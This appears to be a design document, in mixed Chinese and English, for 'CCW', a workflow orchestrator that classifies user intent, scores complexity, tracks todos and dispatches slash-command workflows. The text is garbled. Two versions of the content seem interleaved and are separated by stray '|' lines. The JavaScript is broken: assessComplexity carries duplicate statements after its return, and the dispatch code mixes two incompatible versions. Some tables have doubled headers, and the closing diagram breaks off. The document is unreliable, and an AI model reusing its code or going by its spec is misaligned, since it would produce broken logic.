- 根因不清楚需要诊断
|
||||
|
||||
### 5. Issue (长时间多点修复) 📌
|
||||
**Pattern**: Issue规划 + 队列 + 批量执行
|
||||
**Commands**: `/issue:plan` → `/issue:queue` → `/issue:execute`
|
||||
**When to use**:
|
||||
- 多个相关问题需要批量处理
|
||||
- 长时间跨度的修复任务
|
||||
- 需要优先级排序和冲突解决
|
||||
|
||||
### 6. UI-First (设计驱动) 🎨
|
||||
**Pattern**: UI设计 + 规划 + 执行
|
||||
**Commands**: `/workflow:ui-design:*` → `/workflow:plan` → `/workflow:execute`
|
||||
**When to use**:
|
||||
- 前端功能开发
|
||||
- 需要视觉参考
|
||||
- 设计系统集成
|
||||
```
|
||||
Start
|
||||
│
|
||||
├─ Is it post-development maintenance?
|
||||
│ ├─ Yes → Issue Workflow
|
||||
│ └─ No ↓
|
||||
│
|
||||
├─ Are requirements clear?
|
||||
│ ├─ Uncertain → Level 4 (brainstorm:auto-parallel)
|
||||
│ └─ Clear ↓
|
||||
│
|
||||
├─ Need persistent Session?
|
||||
│ ├─ Yes → Level 3 (plan / tdd-plan / test-fix-gen)
|
||||
│ └─ No ↓
|
||||
│
|
||||
├─ Need multi-perspective / solution comparison?
|
||||
│ ├─ Yes → Level 2 (multi-cli-plan)
|
||||
│ └─ No ↓
|
||||
│
|
||||
├─ Is it a bug fix?
|
||||
│ ├─ Yes → Level 2 (lite-fix)
|
||||
│ └─ No ↓
|
||||
│
|
||||
├─ Need planning?
|
||||
│ ├─ Yes → Level 2 (lite-plan)
|
||||
│ └─ No → Level 1 (lite-lite-lite)
|
||||
```
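The decision tree above can also be read as a small selection function. A minimal sketch, using the level and flow names from the Level Quick Reference table; the boolean inputs are illustrative and would come from intent analysis:

```javascript
// Sketch only: mirrors the decision tree above, not the actual CCW implementation.
function selectLevel({ isMaintenance, requirementsClear, needsSession, needsMultiPerspective, isBugFix, needsPlanning }) {
  if (isMaintenance) return { level: 'Issue', flow: 'issue' }          // post-development maintenance
  if (!requirementsClear) return { level: 'L4', flow: 'full' }         // brainstorm:auto-parallel
  if (needsSession) return { level: 'L3', flow: 'coupled' }            // plan / tdd-plan / test-fix-gen
  if (needsMultiPerspective) return { level: 'L2', flow: 'multi-cli-plan' }
  if (isBugFix) return { level: 'L2', flow: 'bugfix' }                 // lite-fix
  if (needsPlanning) return { level: 'L2', flow: 'rapid' }             // lite-plan
  return { level: 'L1', flow: 'lite-lite-lite' }
}
```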
|
||||
|
||||
## Intent Classification
|
||||
|
||||
```javascript
|
||||
function classifyIntent(input) {
  const text = input.toLowerCase()

  // Priority 1: Bug keywords
  if (/\b(fix|bug|error|issue|crash|broken|fail|wrong|incorrect)\b/.test(text)) {
    if (/\b(hotfix|urgent|production|critical|emergency)\b/.test(text)) {
      return { type: 'bugfix', mode: 'hotfix', workflow: 'lite-fix --hotfix' }
    }
    return { type: 'bugfix', mode: 'standard', workflow: 'lite-fix' }
  }

  // Priority 2: Issue batch keywords
  if (/\b(issues?|batch|queue|多个|批量)\b/.test(text) && /\b(fix|resolve|处理)\b/.test(text)) {
    return { type: 'issue', workflow: 'issue:plan → issue:queue → issue:execute' }
  }

  // Priority 3: Uncertainty keywords → Full workflow
  if (/\b(不确定|不知道|explore|研究|分析一下|怎么做|what if|should i|探索)\b/.test(text)) {
    return { type: 'exploration', workflow: 'brainstorm → plan → execute' }
  }

  // Priority 4: UI/Design keywords
  if (/\b(ui|界面|design|设计|component|组件|style|样式|layout|布局)\b/.test(text)) {
    return { type: 'ui', workflow: 'ui-design → plan → execute' }
  }

  // Priority 5: Complexity assessment for remaining
  const complexity = assessComplexity(text)

  if (complexity === 'high') {
    return { type: 'feature', complexity: 'high', workflow: 'plan → verify → execute' }
  }

  if (complexity === 'medium') {
    return { type: 'feature', complexity: 'medium', workflow: 'lite-plan → lite-execute' }
  }

  return { type: 'feature', complexity: 'low', workflow: 'lite-plan → lite-execute' }
}
|
||||
### Priority Order (with Level Mapping)
|
||||
|
||||
| Priority | Intent | Patterns | Level | Flow |
|
||||
|----------|--------|----------|-------|------|
|
||||
| 1 | bugfix/hotfix | `urgent,production,critical` + bug | L2 | `bugfix.hotfix` |
|
||||
| 1 | bugfix | `fix,bug,error,crash,fail` | L2 | `bugfix.standard` |
|
||||
| 2 | issue batch | `issues,batch` + `fix,resolve` | Issue | `issue` |
|
||||
| 3 | exploration | `不确定,explore,研究,what if` | L4 | `full` |
|
||||
| 3 | multi-perspective | `多视角,权衡,比较方案,cross-verify` | L2 | `multi-cli-plan` |
|
||||
| 4 | quick-task | `快速,简单,small,quick` + feature | L1 | `lite-lite-lite` |
|
||||
| 5 | ui design | `ui,design,component,style` | L3/L4 | `ui` |
|
||||
| 6 | tdd | `tdd,test-driven,先写测试` | L3 | `tdd` |
|
||||
| 7 | test-fix | `测试失败,test fail,fix test` | L3 | `test-fix-gen` |
|
||||
| 8 | review | `review,审查,code review` | L3 | `review-fix` |
|
||||
| 9 | documentation | `文档,docs,readme` | L2 | `docs` |
|
||||
| 99 | feature | complexity-based | L2/L3 | `rapid`/`coupled` |
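A rough sketch of how this priority table could be evaluated against the intent rules in command.json. The rule object shape shown here is an assumption for illustration; the real schema is defined in command.json:

```javascript
// Sketch only: walk intent rules in ascending priority order and return the first match.
// `rules` is assumed to look like [{ priority, intent, patterns: [..], level, flow }, ...].
function matchIntent(input, rules) {
  const text = input.toLowerCase()
  const sorted = [...rules].sort((a, b) => a.priority - b.priority)
  for (const rule of sorted) {
    if (rule.patterns.some(p => text.includes(p))) {
      return { intent: rule.intent, level: rule.level, flow: rule.flow }
    }
  }
  // Priority 99 fallback: generic feature, complexity decides rapid vs coupled
  return { intent: 'feature', level: null, flow: 'complexity-based' }
}
```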
|
||||
|
||||
### Quick Selection Guide
|
||||
|
||||
| Scenario | Recommended Workflow | Level |
|
||||
|----------|---------------------|-------|
|
||||
| Quick fixes, config adjustments | `lite-lite-lite` | 1 |
|
||||
| Clear single-module features | `lite-plan → lite-execute` | 2 |
|
||||
| Bug diagnosis and fix | `lite-fix` | 2 |
|
||||
| Production emergencies | `lite-fix --hotfix` | 2 |
|
||||
| Technology selection, solution comparison | `multi-cli-plan → lite-execute` | 2 |
|
||||
| Multi-module changes, refactoring | `plan → verify → execute` | 3 |
|
||||
| Test-driven development | `tdd-plan → execute → tdd-verify` | 3 |
|
||||
| Test failure fixes | `test-fix-gen → test-cycle-execute` | 3 |
|
||||
| New features, architecture design | `brainstorm:auto-parallel → plan → execute` | 4 |
|
||||
| Post-development issue fixes | Issue Workflow | - |
|
||||
|
||||
### Complexity Assessment
|
||||
|
||||
```javascript
|
||||
function assessComplexity(text) {
  let score = 0

  // Architecture keywords
  if (/\b(refactor|重构|migrate|迁移|architect|架构|system|系统)\b/.test(text)) score += 2

  // Multi-module keywords
  if (/\b(multiple|多个|across|跨|all|所有|entire|整个)\b/.test(text)) score += 2

  // Integration keywords
  if (/\b(integrate|集成|connect|连接|api|database|数据库)\b/.test(text)) score += 1

  // Security/Performance keywords
  if (/\b(security|安全|performance|性能|scale|扩展)\b/.test(text)) score += 1

  if (score >= 4) return 'high'
  if (score >= 2) return 'medium'
  return 'low'
  if (/refactor|重构|migrate|迁移|architect|架构|system|系统/.test(text)) score += 2
  if (/multiple|多个|across|跨|all|所有|entire|整个/.test(text)) score += 2
  if (/integrate|集成|api|database|数据库/.test(text)) score += 1
  if (/security|安全|performance|性能|scale|扩展/.test(text)) score += 1
  return score >= 4 ? 'high' : score >= 2 ? 'medium' : 'low'
}
|
||||
```
|
||||
|
||||
## Execution Flow
|
||||
| Complexity | Flow |
|
||||
|------------|------|
|
||||
| high | `coupled` (plan → verify → execute) |
|
||||
| medium/low | `rapid` (lite-plan → lite-execute) |
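A worked example of the scoring and routing above, using the updated pattern set (the dropped `\b` anchors matter: `\b` never matches between CJK characters, so the Chinese keywords only fire in the new version). The inputs mirror Examples 2 and 3 later in this document:

```javascript
// "重构整个认证模块,迁移到 OAuth2": 重构 (+2 architecture) + 整个 (+2 multi-module) → score 4
assessComplexity('重构整个认证模块,迁移到 OAuth2')  // 'high' → coupled: plan → verify → execute
// "添加用户头像上传功能": no keywords → score 0
assessComplexity('添加用户头像上传功能')             // 'low'  → rapid: lite-plan → lite-execute
```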
|
||||
|
||||
### Phase 1: Input Analysis
|
||||
### Dimension Extraction (WHAT/WHERE/WHY/HOW)
|
||||
|
||||
Extract four dimensions from the user input; they drive requirement clarification and workflow selection:

| Dimension | Extracted content | Example patterns |
|------|----------|----------|
| **WHAT** | action + target | `创建/修复/重构/优化/分析` + target object |
| **WHERE** | scope + paths | `file/module/system` + file paths |
| **WHY** | goal + motivation | `为了.../因为.../目的是...` |
| **HOW** | constraints + preferences | `必须.../不要.../应该...` |

**Clarity Score** (0-3), accumulated as follows (see the sketch after this list):
- +0.5: explicit action
- +0.5: concrete target
- +0.5: file path present
- +0.5: scope is not unknown
- +0.5: explicit goal
- +0.5: constraints given
- -0.5: contains uncertainty words (`不知道/maybe/怎么`)
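A minimal scoring sketch matching the increments above; the dimension fields (`action`, `target`, `paths`, `scope`, `goal`, `constraints`, `uncertain`) are assumed outputs of the WHAT/WHERE/WHY/HOW extraction:

```javascript
// Sketch: accumulate the documented increments and clamp to the 0-3 range.
function computeClarityScore(d) {
  let score = 0
  if (d.action) score += 0.5
  if (d.target) score += 0.5
  if (d.paths && d.paths.length > 0) score += 0.5
  if (d.scope && d.scope !== 'unknown') score += 0.5
  if (d.goal) score += 0.5
  if (d.constraints && d.constraints.length > 0) score += 0.5
  if (d.uncertain) score -= 0.5   // e.g. 不知道 / maybe / 怎么
  return Math.max(0, Math.min(3, score))
}
```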
|
||||
|
||||
### Requirement Clarification
|
||||
|
||||
Requirement clarification is triggered when `clarity_score < 2`:
|
||||
|
||||
```javascript
|
||||
// Parse user input
|
||||
const input = userInput.trim()
|
||||
if (dimensions.clarity_score < 2) {
|
||||
const questions = generateClarificationQuestions(dimensions)
|
||||
// 生成问题:目标是什么? 范围是什么? 有什么约束?
|
||||
AskUserQuestion({ questions })
|
||||
}
|
||||
```
|
||||
|
||||
// Check for explicit workflow request
|
||||
**Clarification question types** (a question-builder sketch follows this list):
- Unclear target → "What do you want to operate on?"
- Unclear scope → "What is the scope of the operation?"
- Unclear goal → "What is the main goal of this operation?"
- Complex operation → "Any special requirements or constraints?"
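`generateClarificationQuestions` (referenced in the snippet above) could map missing dimensions to these question types roughly as follows. The exact wording and the question object shape are assumptions:

```javascript
// Sketch: build question entries for whichever dimensions are still missing.
function generateClarificationQuestions(d) {
  const questions = []
  if (!d.target) questions.push({ header: 'Target', question: 'What do you want to operate on?' })
  if (!d.scope || d.scope === 'unknown') questions.push({ header: 'Scope', question: 'What is the scope of the operation?' })
  if (!d.goal) questions.push({ header: 'Goal', question: 'What is the main goal of this operation?' })
  if (d.complex) questions.push({ header: 'Constraints', question: 'Any special requirements or constraints?' })
  return questions   // fed to AskUserQuestion({ questions })
}
```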
|
||||
|
||||
## TODO Tracking Protocol
|
||||
|
||||
### CRITICAL: Append-Only Rule
|
||||
|
||||
Todos created by CCW **must be appended to the existing list**; they must never overwrite the user's other todos.
|
||||
|
||||
### Implementation
|
||||
|
||||
```javascript
|
||||
// 1. 使用 CCW 前缀隔离工作流 todo
|
||||
const prefix = `CCW:${flowName}`
|
||||
|
||||
// 2. 创建新 todo 时使用前缀格式
|
||||
TodoWrite({
|
||||
todos: [
|
||||
...existingNonCCWTodos, // 保留用户的 todo
|
||||
{ content: `${prefix}: [1/N] /command:step1`, status: "in_progress", activeForm: "..." },
|
||||
{ content: `${prefix}: [2/N] /command:step2`, status: "pending", activeForm: "..." }
|
||||
]
|
||||
})
|
||||
|
||||
// 3. 更新状态时只修改匹配前缀的 todo
|
||||
```
|
||||
|
||||
### Todo Format
|
||||
|
||||
```
|
||||
CCW:{flow}: [{N}/{Total}] /command:name
|
||||
```
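A tiny formatter for this todo format (sketch; the helper name is illustrative):

```javascript
// Sketch: "CCW:rapid: [1/2] /workflow:lite-plan"
const formatTodo = (flow, step, total, command) => `CCW:${flow}: [${step}/${total}] ${command}`
```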
|
||||
|
||||
### Visual Example
|
||||
|
||||
```
|
||||
✓ CCW:rapid: [1/2] /workflow:lite-plan
|
||||
→ CCW:rapid: [2/2] /workflow:lite-execute
|
||||
user's own todos (left untouched)
|
||||
```
|
||||
|
||||
### Status Management
|
||||
|
||||
- Workflow start: create todos for all steps, first step `in_progress`
- Step completed: mark the current step `completed`, set the next step `in_progress`
- Workflow end: mark all CCW todos `completed` (see the sketch below)
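Status updates then touch only CCW-prefixed todos, in line with the append-only rule. A sketch (todo shape as in the TodoWrite example above; the helper name is illustrative):

```javascript
// Sketch: complete the current CCW step and start the next, leaving user todos untouched.
function advanceWorkflowTodos(todos, prefix) {
  const isCcw = t => t.content.startsWith(prefix)
  const current = todos.findIndex(t => isCcw(t) && t.status === 'in_progress')
  if (current !== -1) todos[current].status = 'completed'
  const next = todos.findIndex(t => isCcw(t) && t.status === 'pending')
  if (next !== -1) todos[next].status = 'in_progress'
  return todos   // pass back to TodoWrite({ todos })
}
```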
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```javascript
|
||||
// 1. Check explicit command
|
||||
if (input.startsWith('/workflow:') || input.startsWith('/issue:')) {
|
||||
// User explicitly requested a workflow, pass through
|
||||
SlashCommand(input)
|
||||
return
|
||||
}
|
||||
|
||||
// Classify intent
|
||||
const intent = classifyIntent(input)
|
||||
// 2. Classify intent
|
||||
const intent = classifyIntent(input) // See command.json intent_rules
|
||||
|
||||
console.log(`
|
||||
## Intent Analysis
|
||||
// 3. Select flow
|
||||
const flow = selectFlow(intent) // See command.json flows
|
||||
|
||||
**Input**: ${input.substring(0, 100)}...
|
||||
**Classification**: ${intent.type}
|
||||
**Complexity**: ${intent.complexity || 'N/A'}
|
||||
**Recommended Workflow**: ${intent.workflow}
|
||||
`)
|
||||
```
|
||||
// 4. Create todos with CCW prefix
|
||||
createWorkflowTodos(flow)
|
||||
|
||||
### Phase 2: User Confirmation (Optional)
|
||||
|
||||
```javascript
|
||||
// For high-complexity or ambiguous intents, confirm with user
|
||||
if (intent.complexity === 'high' || intent.type === 'exploration') {
|
||||
const confirmation = AskUserQuestion({
|
||||
questions: [{
|
||||
question: `Recommended: ${intent.workflow}. Proceed?`,
|
||||
header: "Workflow",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: `${intent.workflow} (Recommended)`, description: "Use recommended workflow" },
|
||||
{ label: "Rapid (lite-plan)", description: "Quick iteration" },
|
||||
{ label: "Full (brainstorm+plan)", description: "Complete exploration" },
|
||||
{ label: "Manual", description: "I'll specify the commands" }
|
||||
]
|
||||
}]
|
||||
})
|
||||
|
||||
// Adjust workflow based on user selection
|
||||
intent.workflow = mapSelectionToWorkflow(confirmation)
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 3: Workflow Dispatch
|
||||
|
||||
```javascript
|
||||
switch (intent.workflow) {
|
||||
case 'lite-fix':
|
||||
SlashCommand('/workflow:lite-fix', args: input)
|
||||
break
|
||||
|
||||
case 'lite-fix --hotfix':
|
||||
SlashCommand('/workflow:lite-fix --hotfix', args: input)
|
||||
break
|
||||
|
||||
case 'lite-plan → lite-execute':
|
||||
SlashCommand('/workflow:lite-plan', args: input)
|
||||
// lite-plan will automatically dispatch to lite-execute
|
||||
break
|
||||
|
||||
case 'plan → verify → execute':
|
||||
SlashCommand('/workflow:plan', args: input)
|
||||
// After plan, prompt for verify and execute
|
||||
break
|
||||
|
||||
case 'brainstorm → plan → execute':
|
||||
SlashCommand('/workflow:brainstorm:auto-parallel', args: input)
|
||||
// After brainstorm, continue with plan
|
||||
break
|
||||
|
||||
case 'issue:plan → issue:queue → issue:execute':
|
||||
SlashCommand('/issue:plan', args: input)
|
||||
// Issue workflow handles queue and execute
|
||||
break
|
||||
|
||||
case 'ui-design → plan → execute':
|
||||
// Determine UI design subcommand
|
||||
if (hasReference(input)) {
|
||||
SlashCommand('/workflow:ui-design:imitate-auto', args: input)
|
||||
} else {
|
||||
SlashCommand('/workflow:ui-design:explore-auto', args: input)
|
||||
}
|
||||
break
|
||||
}
|
||||
// 5. Dispatch first command
|
||||
SlashCommand(flow.steps[0].command, args: input)
|
||||
```
|
||||
|
||||
## CLI Tool Integration
|
||||
|
||||
CCW **implicitly invokes** CLI tools for three major benefits:
CCW automatically injects CLI calls under specific conditions:
|
||||
|
||||
### 1. Token 效率 (Context Efficiency)
|
||||
| Condition | CLI Inject |
|
||||
|-----------|------------|
|
||||
| 大量代码上下文 (≥50k chars) | `gemini --mode analysis` |
|
||||
| 高复杂度任务 | `gemini --mode analysis` |
|
||||
| Bug 诊断 | `gemini --mode analysis` |
|
||||
| 多任务执行 (≥3 tasks) | `codex --mode write` |
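These conditions can be folded into a single guard. A sketch using the thresholds from the table; the context field names are assumptions:

```javascript
// Sketch: pick a CLI injection hint from the conditions above; null means no injection.
function pickCliInjection(ctx) {
  if (ctx.contextChars >= 50_000) return { tool: 'gemini', mode: 'analysis' }
  if (ctx.complexity === 'high') return { tool: 'gemini', mode: 'analysis' }
  if (ctx.intent === 'bugfix' && ctx.rootCauseUnclear) return { tool: 'gemini', mode: 'analysis' }
  if (ctx.step === 'execute' && ctx.taskCount >= 3) return { tool: 'codex', mode: 'write' }
  return null
}
```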
|
||||
|
||||
CLI 工具在单独进程中运行,可以处理大量代码上下文而不消耗主会话 token:
|
||||
### CLI Enhancement Phases
|
||||
|
||||
| 场景 | 触发条件 | 自动注入 |
|
||||
|------|----------|----------|
|
||||
| 大量代码上下文 | 文件读取 ≥ 50k 字符 | `gemini --mode analysis` |
|
||||
| 多模块分析 | 涉及 ≥ 5 个模块 | `gemini --mode analysis` |
|
||||
| 代码审查 | review 步骤 | `gemini --mode analysis` |
|
||||
**Phase 1.5: CLI-Assisted Classification**
|
||||
|
||||
### 2. 多模型视角 (Multi-Model Perspectives)
|
||||
当规则匹配不明确时,使用 CLI 辅助分类:
|
||||
|
||||
不同模型有不同优势,CCW 根据任务类型自动选择:
|
||||
| 触发条件 | 说明 |
|
||||
|----------|------|
|
||||
| matchCount < 2 | 多个意图模式匹配 |
|
||||
| complexity = high | 高复杂度任务 |
|
||||
| input > 100 chars | 长输入需要语义理解 |
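Expressed as a predicate (sketch; `matchCount` is assumed to be the number of intent patterns matched on the Phase 1 fast path, and the conditions are copied verbatim from the table):

```javascript
// Sketch: fall back to CLI-assisted semantic classification when rule matching is inconclusive.
const needsCliClassification = ({ matchCount, complexity, input }) =>
  matchCount < 2 || complexity === 'high' || input.length > 100
```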
|
||||
|
||||
| Tool | 核心优势 | 最佳场景 | 触发关键词 |
|
||||
|------|----------|----------|------------|
|
||||
| Gemini | 超长上下文、深度分析、架构理解、执行流追踪 | 代码库理解、架构评估、根因分析 | "分析", "理解", "设计", "架构", "诊断" |
|
||||
| Qwen | 代码模式识别、多维度分析 | Gemini备选、第二视角验证 | "评估", "对比", "验证" |
|
||||
| Codex | 精确代码生成、自主执行、数学推理 | 功能实现、重构、测试 | "实现", "重构", "修复", "生成", "测试" |
|
||||
**Phase 2.5: CLI-Assisted Action Planning**
|
||||
|
||||
### 3. 增强能力 (Enhanced Capabilities)
|
||||
高复杂度任务的工作流优化:
|
||||
|
||||
#### Debug 能力增强
|
||||
```
|
||||
触发条件: intent === 'bugfix' AND root_cause_unclear
|
||||
自动注入: gemini --mode analysis (执行流追踪)
|
||||
用途: 假设驱动调试、状态机错误诊断、并发问题排查
|
||||
```
|
||||
| 触发条件 | 说明 |
|
||||
|----------|------|
|
||||
| complexity = high | 高复杂度任务 |
|
||||
| steps >= 3 | 多步骤工作流 |
|
||||
| input > 200 chars | 复杂需求描述 |
|
||||
|
||||
#### 规划能力增强
|
||||
```
|
||||
触发条件: complexity === 'high' OR intent === 'exploration'
|
||||
自动注入: gemini --mode analysis (架构分析)
|
||||
用途: 复杂任务先用CLI分析获取多模型视角
|
||||
```
|
||||
CLI 可返回建议:`use_default` | `modify` (调整步骤) | `upgrade` (升级工作流)
|
||||
|
||||
### 隐式注入规则 (Implicit Injection Rules)
|
||||
## Continuation Commands
|
||||
|
||||
CCW 在以下条件自动注入 CLI 调用(无需用户显式请求):
|
||||
工作流执行中的用户控制命令:
|
||||
|
||||
```javascript
|
||||
const implicitRules = {
|
||||
// 上下文收集:大量代码使用CLI可节省主会话token
|
||||
context_gathering: {
|
||||
trigger: 'file_read >= 50k chars OR module_count >= 5',
|
||||
inject: 'gemini --mode analysis'
|
||||
},
|
||||
|
||||
// 规划前分析:复杂任务先用CLI分析
|
||||
pre_planning_analysis: {
|
||||
trigger: 'complexity === "high" OR intent === "exploration"',
|
||||
inject: 'gemini --mode analysis'
|
||||
},
|
||||
|
||||
// 调试诊断:利用Gemini的执行流追踪能力
|
||||
debug_diagnosis: {
|
||||
trigger: 'intent === "bugfix" AND root_cause_unclear',
|
||||
inject: 'gemini --mode analysis'
|
||||
},
|
||||
|
||||
// 代码审查:用CLI减少token占用
|
||||
code_review: {
|
||||
trigger: 'step === "review"',
|
||||
inject: 'gemini --mode analysis'
|
||||
},
|
||||
|
||||
// 多任务执行:用Codex自主完成
|
||||
implementation: {
|
||||
trigger: 'step === "execute" AND task_count >= 3',
|
||||
inject: 'codex --mode write'
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 用户语义触发 (Semantic Tool Assignment)
|
||||
|
||||
```javascript
|
||||
// 用户可以通过自然语言指定工具偏好
|
||||
const toolHints = {
|
||||
gemini: /用\s*gemini|gemini\s*分析|让\s*gemini|深度分析|架构理解/i,
|
||||
qwen: /用\s*qwen|qwen\s*评估|让\s*qwen|第二视角/i,
|
||||
codex: /用\s*codex|codex\s*实现|让\s*codex|自主完成|批量修改/i
|
||||
}
|
||||
|
||||
function detectToolPreference(input) {
|
||||
for (const [tool, pattern] of Object.entries(toolHints)) {
|
||||
if (pattern.test(input)) return tool
|
||||
}
|
||||
return null // Auto-select based on task type
|
||||
}
|
||||
```
|
||||
|
||||
### 独立 CLI 工作流 (Standalone CLI Workflows)
|
||||
|
||||
直接调用 CLI 进行特定任务:
|
||||
|
||||
| Workflow | 命令 | 用途 |
|
||||
|----------|------|------|
|
||||
| CLI Analysis | `ccw cli --tool gemini` | 大型代码库快速理解、架构评估 |
|
||||
| CLI Implement | `ccw cli --tool codex` | 明确需求的自主实现 |
|
||||
| CLI Debug | `ccw cli --tool gemini` | 复杂bug根因分析、执行流追踪 |
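Combined with the tool-preference detection above, a standalone CLI dispatch might look like the following sketch (the command form is the one shown in the table; remaining flags are omitted and the default-by-task-type rule is an assumption):

```javascript
// Sketch: honour an explicit tool hint, otherwise default by task type.
function dispatchStandaloneCli(input, taskType) {
  const tool = detectToolPreference(input) ?? (taskType === 'implement' ? 'codex' : 'gemini')
  return `ccw cli --tool ${tool}`
}
```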
|
||||
|
||||
## Index Files (Dynamic Coordination)
|
||||
|
||||
CCW 使用索引文件实现智能命令协调:
|
||||
|
||||
| Index | Purpose |
|
||||
|-------|---------|
|
||||
| [index/command-capabilities.json](index/command-capabilities.json) | 命令能力分类(explore, plan, execute, test, review...) |
|
||||
| [index/workflow-chains.json](index/workflow-chains.json) | 预定义工作流链(rapid, full, coupled, bugfix, issue, tdd, ui...) |
|
||||
|
||||
### 能力分类
|
||||
|
||||
```
|
||||
capabilities:
|
||||
├── explore - 代码探索、上下文收集
|
||||
├── brainstorm - 多角色分析、方案探索
|
||||
├── plan - 任务规划、分解
|
||||
├── verify - 计划验证、质量检查
|
||||
├── execute - 任务执行、代码实现
|
||||
├── bugfix - Bug诊断、修复
|
||||
├── test - 测试生成、执行
|
||||
├── review - 代码审查、质量分析
|
||||
├── issue - 批量问题管理
|
||||
├── ui-design - UI设计、原型
|
||||
├── memory - 文档、知识管理
|
||||
├── session - 会话管理
|
||||
└── debug - 调试、问题排查
|
||||
```
|
||||
|
||||
## TODO Tracking Integration
|
||||
|
||||
CCW 自动使用 TodoWrite 跟踪工作流执行进度:
|
||||
|
||||
```javascript
|
||||
// 工作流启动时自动创建 TODO 列表
|
||||
TodoWrite({
|
||||
todos: [
|
||||
{ content: "CCW: Rapid Iteration (2 steps)", status: "in_progress", activeForm: "Running workflow" },
|
||||
{ content: "[1/2] /workflow:lite-plan", status: "in_progress", activeForm: "Executing lite-plan" },
|
||||
{ content: "[2/2] /workflow:lite-execute", status: "pending", activeForm: "Executing lite-execute" }
|
||||
]
|
||||
})
|
||||
|
||||
// 每个步骤完成后自动更新状态
|
||||
// 支持暂停、继续、跳过操作
|
||||
```
|
||||
|
||||
**进度可视化**:
|
||||
```
|
||||
✓ CCW: Rapid Iteration (2 steps)
|
||||
✓ [1/2] /workflow:lite-plan
|
||||
→ [2/2] /workflow:lite-execute
|
||||
```
|
||||
|
||||
**控制命令**:
|
||||
| Input | Action |
|
||||
|-------|--------|
|
||||
| `continue` | 执行下一步 |
|
||||
| 命令 | 作用 |
|
||||
|------|------|
|
||||
| `continue` | 继续执行下一步 |
|
||||
| `skip` | 跳过当前步骤 |
|
||||
| `abort` | 停止工作流 |
|
||||
| `/workflow:*` | 执行指定命令 |
|
||||
| `abort` | 终止工作流 |
|
||||
| `/workflow:*` | 切换到指定命令 |
|
||||
| 自然语言 | 重新分析意图 |
|
||||
|
||||
## Reference Documents
|
||||
## Workflow Flow Details
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [phases/orchestrator.md](phases/orchestrator.md) | 编排器决策逻辑 + TODO 跟踪 |
|
||||
| [phases/actions/rapid.md](phases/actions/rapid.md) | 快速迭代组合 |
|
||||
| [phases/actions/full.md](phases/actions/full.md) | 完整流程组合 |
|
||||
| [phases/actions/coupled.md](phases/actions/coupled.md) | 复杂耦合组合 |
|
||||
| [phases/actions/bugfix.md](phases/actions/bugfix.md) | 缺陷修复组合 |
|
||||
| [phases/actions/issue.md](phases/actions/issue.md) | Issue工作流组合 |
|
||||
| [specs/intent-classification.md](specs/intent-classification.md) | 意图分类规范 |
|
||||
| [WORKFLOW_DECISION_GUIDE.md](/WORKFLOW_DECISION_GUIDE.md) | 工作流决策指南 |
|
||||
### Issue Workflow (Main Workflow 补充机制)
|
||||
|
||||
## Examples
|
||||
Issue Workflow 是 Main Workflow 的**补充机制**,专注于开发后的持续维护。
|
||||
|
||||
#### 设计理念
|
||||
|
||||
| 方面 | Main Workflow | Issue Workflow |
|
||||
|------|---------------|----------------|
|
||||
| **用途** | 主要开发周期 | 开发后维护 |
|
||||
| **时机** | 功能开发阶段 | 主工作流完成后 |
|
||||
| **范围** | 完整功能实现 | 针对性修复/增强 |
|
||||
| **并行性** | 依赖分析 → Agent 并行 | Worktree 隔离 (可选) |
|
||||
| **分支模型** | 当前分支工作 | 可使用隔离的 worktree |
|
||||
|
||||
#### 为什么 Main Workflow 不自动使用 Worktree?
|
||||
|
||||
**依赖分析已解决并行性问题**:
|
||||
1. 规划阶段 (`/workflow:plan`) 执行依赖分析
|
||||
2. 自动识别任务依赖和关键路径
|
||||
3. 划分为**并行组**(独立任务)和**串行链**(依赖任务)
|
||||
4. Agent 并行执行独立任务,无需文件系统隔离
|
||||
|
||||
#### 两阶段生命周期
|
||||
|
||||
### Example 1: Bug Fix
|
||||
```
|
||||
User: 用户登录失败,返回 401 错误
|
||||
CCW: Intent=bugfix, Workflow=lite-fix
|
||||
→ /workflow:lite-fix "用户登录失败,返回 401 错误"
|
||||
┌─────────────────────────────────────────────────────────────────────┐
|
||||
│ Phase 1: Accumulation (积累阶段) │
|
||||
│ │
|
||||
│ Triggers: 任务完成后的 review、代码审查发现、测试失败 │
|
||||
│ │
|
||||
│ ┌────────────┐ ┌────────────┐ ┌────────────┐ │
|
||||
│ │ discover │ │ discover- │ │ new │ │
|
||||
│ │ Auto-find │ │ by-prompt │ │ Manual │ │
|
||||
│ └────────────┘ └────────────┘ └────────────┘ │
|
||||
│ │
|
||||
│ 持续积累 issues 到待处理队列 │
|
||||
└─────────────────────────────────────────────────────────────────────┘
|
||||
│
|
||||
│ 积累足够后
|
||||
▼
|
||||
┌─────────────────────────────────────────────────────────────────────┐
|
||||
│ Phase 2: Batch Resolution (批量解决阶段) │
|
||||
│ │
|
||||
│ ┌────────────┐ ┌────────────┐ ┌────────────┐ │
|
||||
│ │ plan │ ──→ │ queue │ ──→ │ execute │ │
|
||||
│ │ --all- │ │ Optimize │ │ Parallel │ │
|
||||
│ │ pending │ │ order │ │ execution │ │
|
||||
│ └────────────┘ └────────────┘ └────────────┘ │
|
||||
│ │
|
||||
│ 支持 worktree 隔离,保持主分支稳定 │
|
||||
└─────────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
### Example 2: New Feature (Simple)
|
||||
#### 与 Main Workflow 的协作
|
||||
|
||||
```
|
||||
User: 添加用户头像上传功能
|
||||
CCW: Intent=feature, Complexity=low, Workflow=lite-plan→lite-execute
|
||||
→ /workflow:lite-plan "添加用户头像上传功能"
|
||||
开发迭代循环
|
||||
┌─────────────────────────────────────────────────────────────────────┐
|
||||
│ │
|
||||
│ ┌─────────┐ ┌─────────┐ │
|
||||
│ │ Feature │ ──→ Main Workflow ──→ Done ──→│ Review │ │
|
||||
│ │ Request │ (Level 1-4) └────┬────┘ │
|
||||
│ └─────────┘ │ │
|
||||
│ ▲ │ 发现 Issues │
|
||||
│ │ ▼ │
|
||||
│ │ ┌─────────┐ │
|
||||
│ 继续 │ │ Issue │ │
|
||||
│ 新功能│ │ Workflow│ │
|
||||
│ │ └────┬────┘ │
|
||||
│ │ ┌──────────────────────────────┘ │
|
||||
│ │ │ 修复完成 │
|
||||
│ │ ▼ │
|
||||
│ ┌────┴────┐◀────── │
|
||||
│ │ Main │ Merge │
|
||||
│ │ Branch │ back │
|
||||
